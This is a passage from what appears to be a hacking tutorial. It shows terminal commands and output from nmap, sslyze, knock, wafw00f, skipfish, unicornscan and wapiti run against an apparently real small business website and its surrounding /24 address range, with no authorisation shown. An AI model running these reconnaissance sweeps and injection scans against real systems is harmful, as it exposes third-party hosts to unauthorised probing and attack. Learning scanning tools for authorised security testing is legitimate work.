653. | tls-nextprotoneg:
654. | http/1.1
655. |_ http/1.0
656. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
657. OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
658. No OS matches for host
659. Uptime guess: 0.003 days (since Sun May 29 12:53:57 2016)
660. Network Distance: 17 hops
661. TCP Sequence Prediction: Difficulty=261 (Good luck!)
662. IP ID Sequence Generation: All zeros
663.  
664. TRACEROUTE (using port 443/tcp)
665. HOP RTT ADDRESS
666. 1 3.37 ms 192.168.1.1
667. 2 ...
668. 3 10.25 ms 172.17.19.169
669. 4 13.05 ms 172.17.18.61
670. 5 13.14 ms 172.19.240.133
671. 6 12.84 ms 93.186.128.245
672. 7 10.91 ms 195.22.205.155
673. 8 11.54 ms 4.68.111.165
674. 9 ...
675. 10 106.27 ms 4.15.136.118
676. 11 106.89 ms 184.168.6.83
677. 12 106.79 ms 184.168.6.83
678. 13 ... 16
679. 17 108.63 ms 198.71.232.3
680.  
681. NSE: Script Post-scanning.
682. Initiating NSE at 12:58
683. Completed NSE at 12:58, 0.00s elapsed
684. Initiating NSE at 12:58
685. Completed NSE at 12:58, 0.00s elapsed
686. Read data files from: /usr/bin/../share/nmap
687. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
688. Nmap done: 1 IP address (1 host up) scanned in 3216.79 seconds
689. Raw packets sent: 4123 (155.388KB) | Rcvd: 42 (2.672KB)
690.  
691.  
692. USE SSLYZE
693.  
694. ┌─[root@parrot]─[~]
695. └──╼ #sslyze --regular 198.71.232.3:443
696.  
697.  
698. REGISTERING AVAILABLE PLUGINS
699. -----------------------------
700.  
701. PluginSessionRenegotiation
702. PluginCompression
703. PluginSessionResumption
704. PluginCertInfo
705. PluginOpenSSLCipherSuites
706.  
707.  
708.  
709. CHECKING HOST(S) AVAILABILITY
710. -----------------------------
711.  
712. 198.71.232.3:443 => 198.71.232.3:443
713.  
714.  
715.  
716. SCAN RESULTS FOR 198.71.232.3:443 - 198.71.232.3:443
717. ----------------------------------------------------
718.  
719. Unhandled exception when processing --compression:
720. utils.ctSSL.errors.ctSSLFeatureNotAvailable - Could not enable Zlib compression: OpenSSL was not built with Zlib support ?
721.  
722. * Certificate :
723. Validation w/ Mozilla's CA Store: Certificate is Trusted
724. Hostname Validation: MISMATCH
725. SHA1 Fingerprint: 95A592DAFDD9DCB8E55455991D1B5AE17F0FD2C7
726.  
727. Common Name: *.godaddysites.com
728. Issuer: /C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certificates.godaddy.com/repository/CN=Go Daddy Secure Certification Authority/serialNumber=07969287
729. Serial Number: 4B09760F282ABD
730. Not Before: Dec 9 21:03:50 2013 GMT
731. Not After: Dec 9 21:03:50 2016 GMT
732. Signature Algorithm: sha1WithRSAEncryption
733. Key Size: 2048
734. X509v3 Subject Alternative Name: DNS:*.godaddysites.com, DNS:godaddysites.com
735.  
736. * Session Renegotiation :
737. Client-initiated Renegotiations: Honored
738. Secure Renegotiation: Supported
739.  
740. Unhandled exception when processing --sslv2:
741. utils.ctSSL.errors.ctSSLFeatureNotAvailable - SSLv2 disabled.
742.  
743. * Session Resumption :
744. With Session IDs: Not supported (0 successful, 5 failed, 0 errors, 5 total attempts).
745. With TLS Session Tickets: Not Supported - TLS ticket assigned but not accepted.
746.  
747. * TLSV1_1 Cipher Suites :
748.  
749. Rejected Cipher Suite(s): Hidden
750.  
751. Preferred Cipher Suite:
752. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
753.  
754. Accepted Cipher Suite(s):
755. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
756. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
757. AES256-SHA 256 bits HTTP 404 Not Found
758. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
759. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
760. AES128-SHA 128 bits HTTP 404 Not Found
761. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
762. DES-CBC3-SHA 112 bits HTTP 404 Not Found
763.  
764. Unknown Errors: None
765.  
766. * TLSV1_2 Cipher Suites :
767.  
768. Rejected Cipher Suite(s): Hidden
769.  
770. Preferred Cipher Suite:
771. ECDHE-RSA-AES256-GCM-SHA384256 bits HTTP 404 Not Found
772.  
773. Accepted Cipher Suite(s):
774. ECDHE-RSA-AES256-SHA384 256 bits HTTP 404 Not Found
775. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
776. ECDHE-RSA-AES256-GCM-SHA384256 bits HTTP 404 Not Found
777. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
778. AES256-SHA256 256 bits HTTP 404 Not Found
779. AES256-SHA 256 bits HTTP 404 Not Found
780. AES256-GCM-SHA384 256 bits HTTP 404 Not Found
781. ECDHE-RSA-AES128-SHA256 128 bits HTTP 404 Not Found
782. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
783. ECDHE-RSA-AES128-GCM-SHA256128 bits HTTP 404 Not Found
784. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
785. AES128-SHA256 128 bits HTTP 404 Not Found
786. AES128-SHA 128 bits HTTP 404 Not Found
787. AES128-GCM-SHA256 128 bits HTTP 404 Not Found
788. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
789. DES-CBC3-SHA 112 bits HTTP 404 Not Found
790.  
791. Unknown Errors: None
792.  
793. * SSLV3 Cipher Suites :
794.  
795. Rejected Cipher Suite(s): Hidden
796.  
797. Preferred Cipher Suite: None
798.  
799. Accepted Cipher Suite(s): None
800.  
801. Unknown Errors: None
802.  
803. * TLSV1 Cipher Suites :
804.  
805. Rejected Cipher Suite(s): Hidden
806.  
807. Preferred Cipher Suite:
808. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
809.  
810. Accepted Cipher Suite(s):
811. ECDHE-RSA-AES256-SHA 256 bits HTTP 404 Not Found
812. CAMELLIA256-SHA 256 bits HTTP 404 Not Found
813. AES256-SHA 256 bits HTTP 404 Not Found
814. ECDHE-RSA-AES128-SHA 128 bits HTTP 404 Not Found
815. CAMELLIA128-SHA 128 bits HTTP 404 Not Found
816. AES128-SHA 128 bits HTTP 404 Not Found
817. ECDHE-RSA-DES-CBC3-SHA 112 bits HTTP 404 Not Found
818. DES-CBC3-SHA 112 bits HTTP 404 Not Found
819.  
820. Unknown Errors: None
821.  
822.  
823.  
824. SCAN COMPLETED IN 3.07 S
825. ------------------------
826.  
827. Install knock
828.  
829. ┌─[root@parrot]─[~]
830. └──╼ #wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
831. --2016-05-29 12:19:30-- https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/knock/knock-1.5.tar.gz
832. Resolving storage.googleapis.com (storage.googleapis.com)... 172.217.16.208, 2a00:1450:4001:801::2010
833. Connecting to storage.googleapis.com (storage.googleapis.com)|172.217.16.208|:443... connected.
834. HTTP request sent, awaiting response... 200 OK
835. Length: 8484 (8.3K) [application/octet-stream]
836. Saving to: ‘knock-1.5.tar.gz’
837.  
838. knock-1.5.tar.gz 100%[=====================>] 8.29K --.-KB/s in 0.002s
839.  
840. 2016-05-29 12:19:36 (4.03 MB/s) - ‘knock-1.5.tar.gz’ saved [8484/8484]
841.  
842. ┌─[root@parrot]─[~]
843. └──╼ #ls
844. Desktop Downloads Music Public Videos
845. Documents knock-1.5.tar.gz Pictures Templates
846.  
847. ┌─[root@parrot]─[~]
848. └──╼ #tar -xvzf knock-1.5.tar.gz
849. knock.py
850.  
851. ┌─[root@parrot]─[~]
852. └──╼ #cp knock.py Desktop
853.  
854. ┌─[root@parrot]─[~]
855. └──╼ #cd Desktop/
856.  
857. ┌─[root@parrot]─[~/Desktop]
858. └──╼ #chmod +x knock.py
859.  
860. USE KNOCK
861.  
862. $ python knock.py <option> <url>
863.  
864. Rapid Scan
865.  
866. Scanning with internal wordlist:
867. $ python knock.py <url>
868.  
869. Scanning with external wordlist:
870. $ python knock.py <url> <wordlist>
871.  
872. Options
873. -zt Zone Transfer discovery:
874.  
875. $ python knock.py -zt <url>
876. -dns Dns resolver:
877.  
878. $ python knock.py -dns <url>
879. -wc Wildcard testing:
880.  
881. $ python knock.py -wc <url>
882. -wc Wildcard bypass:
883.  
884. $ python knock.py -bw <stringexclude> <url>
885.  
886. ┌─[root@parrot]─[~/Desktop]
887. └──╼ #./knock.py vyxunbnbs.com --wordlist /root/Desktop/rockyou.txt
888. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
889.  
890. [+] Testing domain
891. www.vyxunbnbs.com 198.71.232.3
892. [+] Dns resolving
893. Domain name Ip address Name server
894. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
895. Found 1 host(s) for vyxunbnbs.com
896. [+] Testing wildcard
897.  
898. Wildcard enabled! Try with -bw option
899. Example: knock -bw 404 vyxunbnbs.com
900.  
901. ┌─[root@parrot]─[~/Desktop]
902. └──╼ #./knock.py -bw 404 vyxunbnbs.com
903. Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )
904.  
905. [+] Testing domain
906. www.vyxunbnbs.com 198.71.232.3
907. [+] Dns resolving
908. Domain name Ip address Name server
909. vyxunbnbs.com 198.71.232.3 ip-198-71-232-3.ip.secureserver.net
910. Found 1 host(s) for vyxunbnbs.com
911. [+] Bypass wildcard
912. 0.vyxunbnbs.com
913. 01.vyxunbnbs.com
914. 02.vyxunbnbs.com
915. 03.vyxunbnbs.com
916. 1.vyxunbnbs.com
917.  
918. --snip--
919.  
920. Found 1904 subdomain(s) in 523.4 second(s)
921.  
922.  
923. CHECK IF THE SITE IS BEHIND A FIREWALL
924.  
925. ┌─[root@parrot]─[~]
926. └──╼ #wafw00f 198.71.232.3
927.  
928. ^ ^
929. _ __ _ ____ _ __ _ _ ____
930. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
931. | V V // o // _/ | V V // 0 // 0 // _/
932. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
933. <
934. ...'
935.  
936. WAFW00F - Web Application Firewall Detection Tool
937.  
938. By Sandro Gauci && Wendel G. Henrique
939.  
940. Checking http://198.71.232.3
941. The site http://198.71.232.3 is behind a SecureIIS
942. Number of requests: 9
943.  
944.  
945. CHECK THE SITE WITH SKIPFISH
946.  
947. ┌─[root@parrot]─[~]
948. └──╼ #skipfish -o /tmp/snep http://www.vyxunbnbs.com
949.  
950.  
951. skipfish version 2.10b by lcamtuf@google.com 345 kB out (199.0 kB/s) l
952. skipfish version 2.10b by lcamtuf@google.com 352 kB out (201.2 kB/s) l
953. skipfish version 2.10b by lcamtuf@google.com 358 kB out (206.1 kB/s) l
954. skipfish version 2.10b by lcamtuf@google.com 369 kB out (214.7 kB/s) l
955. - www.vyxunbnbs.com -30.831s), 6349 kB in, 378 kB out (221.3 kB/s) l
956. - www.vyxunbnbs.com -31.125s), 6612 kB in, 386 kB out (227.0 kB/s) l
957. Scan statistics:: 0:00:31.635s), 6796 kB in, 391 kB out (230.9 kB/s) l
958. Scan statistics:: 0:00:31.920s), 7064 kB in, 398 kB out (235.9 kB/s) l
959. Scan time : 0:00:32.170s), 7236 kB in, 403 kB out (239.4 kB/s) l
960. Scan time : 0:00:32.334s), 7389 kB in, 407 kB out (242.4 kB/s) l
961. HTTP requests : 1728 (53.4/s), 7460 kB in, 408 kB out (243.3 kB/s) l
962. Compression : 5611 kB in, 26863 kB out (65.4% gain) 0 drops0 val
963. HTTP faults : 1 net errors, 0 proto errors, 1 retried, 0 drops0 val
964. TCP handshakes : 19 total (90.9 req/conn) purgeddict 1 par, 0 val
965. TCP faults : 0 failures, 0 timeouts, 8 purgeddict 1 par, 0 val
966. External links : 5456 skipped done (91.30%) 0 dict 1 par, 0 val
967. Reqs pending : 0 21 done (91.30%) 0 dict 1 par, 0 val
968. Database statistics: total, 21 done (91.30%) 0 dict 1 par, 0 val
969. Database statistics: total, 21 done (91.30%) 0 dict 1 par, 0 val
970. Pivots : 23 total, 21 done (91.30%) 0 dict 1 par, 0 val
971. Pivots : 23 total, 22 done (95.65%) 0 dict 1 par, 0 val
972. In progress : 0 pending, 0 init, 1 attacks, 0 dict 1 par, 0 val
973. Missing nodes : 0 spotted dir, 20 file, 0 pinfo, 0 unkn, 1 par, 0 val
974. Node types : 1 serv, 1 dir, 20 file, 0 pinfo, 0 unkn, 1 par, 0 val
975. Issues found : 6 info, 1 warn, 102 low, 39 medium, 0 high impact
976. Dict size : 17 words (17 new), 2 extensions, 256 candidates
977. Signatures : 77 total
978.  
979. [+] Copying static resources...
980. [+] Sorting and annotating crawl nodes: 23
981. [+] Looking for duplicate entries: 23
982. [+] Counting unique nodes: 14
983. [+] Saving pivot data for third-party tools...
984. [+] Writing scan description...
985. [+] Writing crawl tree: 23
986. [+] Generating summary views...
987. [+] Report saved to '/tmp/snep/index.html' [0xed916f54].
988. [+] This was a great day for science!
989.  
990. ┌─[root@parrot]─[~]
991. └──╼ #firefox /tmp/snep/index.html
992.  
993. CHECK THE SITE WITH UNICORNSCAN
994.  
995. ┌─[root@parrot]─[~]
996. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
997.  
998. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
999. using interface(s) eth0
1000. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
1001. sender statistics 199.2 pps with 3 packets sent total
1002. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1003. TCP open 198.71.232.3:80 ttl 47
1004. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1005. TCP open 198.71.232.3:443 ttl 47
1006. listener statistics 72 packets recieved 0 packets droped and 0 interface drops
1007. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
1008. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
1009.  
1010. UDP Scan
1011.  
1012. ┌─[root@parrot]─[~]
1013. └──╼ #unicornscan -mU -r200 -I 198.71.232.3
1014.  
1015.  
1016. Where
1017.  
1018. __________________________________________________________________
1019. -mU : is mode UDP
1020. -I : Display Immediately
1021. 198.71.232.3 : target IP
1022. :53 : port number
1023. -r200 : 200 Packets per second
1024. ___________________________________________________________________
1025.  
1026. TCP Scan
1027.  
1028. ┌─[✗]─[root@parrot]─[~]
1029. └──╼ #unicornscan -r500 -mT 198.71.232.1/24:80,443,445,339
1030.  
1031.  
1032. Where
1033.  
1034. __________________________________________________________________
1035. -mT : is mode TCP
1036. 198.71.232.3/24 : target network range ( block )
1037. :80,443,445,339 : ports
1038. -r500 : 500 Packets per second
1039. ___________________________________________________________________
1040.  
1041. Many Other options you can pass , for example for ACK use -mTsA
1042.  
1043. SYN : -mT
1044. ACK scan : -mTsA
1045. Fin scan : -mTsF
1046. Null scan : -mTs
1047. Xmas scan : -mTsFPU
1048. Connect Scan : -msf -Iv
1049. scan with all options : -mTFSRPAUEC
1050. Syn + osdetect : -eosdetect -Iv (-mT)
1051. scan ports 1 through 5 : (-mT) host:1-5
1052.  
1053. Practical Use Case
1054.  
1055. scanning for mysql with http and https ports
1056.  
1057. ┌─[root@parrot]─[~]
1058. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
1059. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
1060. using interface(s) eth0
1061. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
1062. sender statistics 194.9 pps with 3 packets sent total
1063. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1064. TCP open 198.71.232.3:80 ttl 47
1065. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1066. TCP open 198.71.232.3:443 ttl 47
1067. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1068. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
1069. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 9414 and we have 1550
1070. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1071. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1072. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 3254 and we have 1550
1073. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1074. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4372 and we have 1550
1075. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1076. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 4094 and we have 1550
1077. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1078. listener statistics 193 packets recieved 0 packets droped and 0 interface drops
1079. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
1080. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
1081.  
1082. ┌─[root@parrot]─[~]
1083. └──╼ #unicornscan -eosdetect -Iv -v vyxunbnbs.com
1084. adding 198.71.232.3/32 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
1085. using interface(s) eth0
1086. added module payload for port 1900 proto 17
1087. added module payload for port 80 proto 6
1088. added module payload for port 5060 proto 17
1089. added module payload for port 53 proto 17
1090. added module payload for port 80 proto 6
1091. added module payload for port 518 proto 17
1092. scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
1093. drone type Unknown on fd 4 is version 1.1
1094. drone type Unknown on fd 5 is version 1.1
1095. added module payload for port 1900 proto 17
1096. added module payload for port 80 proto 6
1097. added module payload for port 5060 proto 17
1098. added module payload for port 53 proto 17
1099. added module payload for port 80 proto 6
1100. added module payload for port 518 proto 17
1101. scan iteration 1 out of 1
1102. using pcap filter: `dst 192.168.1.83 and ! src 192.168.1.83 and (tcp)'
1103. using TSC delay
1104. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1105. TCP open 198.71.232.3:80 ttl 47
1106. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1107. TCP open 198.71.232.3:443 ttl 47
1108. sender statistics 290.1 pps with 338 packets sent total
1109. listener statistics 166 packets recieved 0 packets droped and 0 interface drops
1110. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
1111. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
1112.  
1113.  
1114. ┌─[root@parrot]─[~]
1115. └──╼ #unicornscan -r200 -Iv -eosdetect -mT vyxunbnbs.com:3306,80,443
1116. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
1117. using interface(s) eth0
1118. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
1119. sender statistics 138.1 pps with 3 packets sent total
1120. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1121. TCP open 198.71.232.3:80 ttl 47
1122. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1123. TCP open 198.71.232.3:443 ttl 47
1124. listener statistics 142 packets recieved 0 packets droped and 0 interface drops
1125. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
1126. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
1127.  
1128. ┌─[root@parrot]─[~]
1129. └──╼ #unicornscan -r200 -Iv -eosdetect -mT 198.71.232.3:3306,80,443
1130. adding 198.71.232.3/32 mode `TCPscan' ports `3306,80,443' pps 200
1131. using interface(s) eth0
1132. scaning 1.00e+00 total hosts with 3.00e+00 total packets, should take a little longer than 7 Seconds
1133. sender statistics 199.3 pps with 3 packets sent total
1134. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1135. TCP open 198.71.232.3:80 ttl 47
1136. ST 1 IP TTL 47 TOS 0x00 [DF] TCP WS 14480 urg_ptr 0000
1137. TCP open 198.71.232.3:443 ttl 47
1138. listener statistics 146 packets recieved 0 packets droped and 0 interface drops
1139. TCP open http[ 80] from 198.71.232.3 ttl 47 OS `'
1140. TCP open https[ 443] from 198.71.232.3 ttl 47 OS `'
1141.  
1142.  
1143. ┌─[root@parrot]─[~]
1144. └──╼ #unicornscan -msf -v -I 198.71.232.3/24
1145. adding 198.71.232.0/24 mode `TCPscan' ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
1146. using interface(s) eth0
1147. scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
1148. connected 192.168.1.83:39367 -> 198.71.232.3:443
1149. TCP open 198.71.232.3:443 ttl 47
1150. connected 192.168.1.83:31012 -> 198.71.232.5:443
1151. TCP open 198.71.232.5:443 ttl 110
1152. connected 192.168.1.83:7126 -> 198.71.232.4:443
1153. TCP open 198.71.232.4:443 ttl 47
1154. connected 192.168.1.83:32420 -> 198.71.232.7:443
1155. TCP open 198.71.232.7:443 ttl 47
1156. connected 192.168.1.83:6417 -> 198.71.232.6:443
1157. TCP open 198.71.232.6:443 ttl 47
1158. connected 192.168.1.83:64190 -> 198.71.232.4:80
1159. TCP open 198.71.232.4:80 ttl 47
1160. connected 192.168.1.83:36816 -> 198.71.232.6:80
1161. TCP open 198.71.232.6:80 ttl 47
1162. connected 192.168.1.83:56533 -> 198.71.232.7:80
1163. TCP open 198.71.232.7:80 ttl 47
1164. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1165. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 1722 and we have 1550
1166. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1167. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1168. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 2932 and we have 1550
1169. Recv [Error packet_parse.c:335] likely bad: packet has incorrect ip length, skipping it [ip total length claims 5435 and we have 1550
1170. connected 192.168.1.83:5563 -> 198.71.232.7:22
1171. TCP open 198.71.232.7:22 ttl 47
1172. connected 192.168.1.83:7734 -> 198.71.232.1:25
1173. TCP open 198.71.232.1:25 ttl 47
1174. connected 192.168.1.83:43683 -> 198.71.232.0:25
1175. TCP open 198.71.232.0:25 ttl 47
1176. connected 192.168.1.83:30502 -> 198.71.232.2:25
1177. TCP open 198.71.232.2:25 ttl 47
1178. sender statistics 290.9 pps with 86528 packets sent total
1179. listener statistics 180 packets recieved 0 packets droped and 0 interface drops
1180. TCP open smtp[ 25] from 198.71.232.0 ttl 47
1181. TCP open smtp[ 25] from 198.71.232.1 ttl 47
1182. TCP open smtp[ 25] from 198.71.232.2 ttl 47
1183. TCP open https[ 443] from 198.71.232.3 ttl 47
1184. TCP open http[ 80] from 198.71.232.4 ttl 47
1185. TCP open https[ 443] from 198.71.232.4 ttl 47
1186. TCP open https[ 443] from 198.71.232.5 ttl 110
1187. TCP open http[ 80] from 198.71.232.6 ttl 47
1188. TCP open https[ 443] from 198.71.232.6 ttl 47
1189. TCP open ssh[ 22] from 198.71.232.7 ttl 47
1190. TCP open http[ 80] from 198.71.232.7 ttl 47
1191. TCP open https[ 443] from 198.71.232.7 ttl 47
1192.  
1193.  
1194. ┌─[✗]─[root@parrot]─[~]
1195. └──╼ #unicornscan -mU -v -I 198.71.232.3/24
1196. adding 198.71.232.0/24 mode `UDPscan' ports `7,9,11,13,17,19,20,37,39,42,49,52-54,65-71,81,111,161,123,136-170,514-518,630,631,636-640,650,653,921,1023-1030,1900,2048-2050,27900,27960,32767-32780,32831' pps 300
1197. using interface(s) eth0
1198. scaning 2.56e+02 total hosts with 2.66e+04 total packets, should take a little longer than 1 Minutes, 35 Seconds
1199. UDP open 192.168.1.1:53 ttl 64
1200.  
1201. --snip--
1202.  
1203. CHECK THE SITE WITH WAPITI
1204.  
1205. ┌─[root@parrot]─[~]
1206. └──╼ #wapiti http://www.vyxunbnbs.com/ -n 10 -b folder -u -v 1 -f html -o /tmp/scan_report
1207. Wapiti-2.3.0 (wapiti.sourceforge.net)
1208.  
1209. [*] Loading modules:
1210. mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto
1211.  
1212. [+] Launching module exec
1213. + attackGET http://www.vyxunbnbs.com/
1214. + attackGET http://www.vyxunbnbs.com/site.css?v=
1215. + attackGET http://www.vyxunbnbs.com/common/wsb/core
1216. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
1217. + attackGET http://www.vyxunbnbs.com/home.html
1218. + attackGET http://www.vyxunbnbs.com/contact.html
1219. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/navigation/subNavigation
1220. + attackGET http://www.vyxunbnbs.com/products.html
1221. + attackGET http://www.vyxunbnbs.com/bullet-jewellery.html
1222. + attackGET http://www.vyxunbnbs.com/boar-tusk-necklaces.html
1223. + attackGET http://www.vyxunbnbs.com/decorated-skulls-.html
1224. + attackGET http://www.vyxunbnbs.com/bone-art.html
1225. + attackGET http://www.vyxunbnbs.com/leather-crafting.html
1226. + attackGET http://www.vyxunbnbs.com/wooden-items.html
1227. + attackGET http://www.vyxunbnbs.com/random-items.html
1228. + attackGET http://www.vyxunbnbs.com/WSB.ForceDesktop
1229. + attackGET http://www.vyxunbnbs.com/common/cookiemanager/cookiemanager
1230. + attackGET http://www.vyxunbnbs.com/designer/iebackground/iebackground
1231. + attackGET http://www.vyxunbnbs.com/.view-as-mobile
1232. + attackGET http://www.vyxunbnbs.com/.wsb-canvas-page-container
1233. + attackGET http://www.vyxunbnbs.com/vyxunbnbs.com
1234. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/canvas/elements/customform/customForm.published
1235. + attackGET http://www.vyxunbnbs.com/designer/app/builder/ui/controls/media/gallery/media.gallery
1236. + attackGET http://www.vyxunbnbs.com/Loading...
1237. + attackGET http://www.vyxunbnbs.com/designer/social/twitter/social.twitter
1238. + attackGET http://www.vyxunbnbs.com/plugins/twitter/index.php
1239. + attackGET http://www.vyxunbnbs.com/designer/util/facebookSDKHelper
1240.  
1241. [+] Launching module file
1242. + attackGET http://www.vyxunbnbs.com/
1243. + attackGET http://www.vyxunbnbs.com/site.css?v=
1244. + attackGET http://www.vyxunbnbs.com/common/wsb/core
1245. + attackGET http://www.vyxunbnbs.com/libs/knockout/knockout
1246. + attackGET http://www.vyxunbnbs.com/home.html
